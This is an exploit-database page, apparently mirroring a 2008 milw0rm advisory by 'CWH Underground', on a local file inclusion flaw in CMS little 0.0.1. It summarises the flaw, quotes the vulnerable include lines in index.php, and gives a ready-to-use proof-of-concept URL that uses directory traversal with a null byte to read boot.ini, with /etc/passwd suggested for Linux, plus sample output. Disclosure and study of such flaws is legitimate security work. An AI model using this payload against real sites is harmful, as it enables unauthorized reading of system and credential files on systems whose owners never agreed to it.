header-logo
Suggest Exploit
vendor:
CMS little
by:
CWH Underground
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: CMS little
Affected Version From: 0.0.1
Affected Version To: 0.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:littlecms:cms_little:0.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2008

CMS little (index.php template) Local File Inclusion Vulnerability

A Local File Inclusion (LFI) vulnerability exists in CMS little 0.0.1. An attacker can exploit this vulnerability to include arbitrary files from the local system, such as boot.ini or /etc/passwd, by sending a specially crafted HTTP request to the vulnerable application. This can be done by sending a request to the vulnerable index.php file with the template parameter set to a relative path of the file to be included.

Mitigation:

The vendor has not released a patch to address this vulnerability. As a general security measure, users should ensure that web applications are kept up-to-date with the latest version.
Source

Exploit-DB raw data:

======================================================================
  CMS little (index.php template) Local File Inclusion Vulnerability
======================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 2 July 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : CMS little
 VERSION     : 0.0.1
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/littlecms/CMSLite.zip
#####################################################

--- Local File Inclusion ---

-----------------------------
 Vulnerable File (index.php)
-----------------------------

@Line 
   64:  include $currentpage[template];
   65:  } else {
   66:	include $template.".tmpl.php";

---------
 Exploit
---------

[+] http://[Target]/[cmslite_path]/index.php?template=[LFI]


------
 POC
------

[+] http://[Target]/[cmslite_path]/index.php?template=../../../../../../../../boot.ini%00


    This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    You can change boot.ini to /etc/passwd%00 in linux OS.
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-07-02]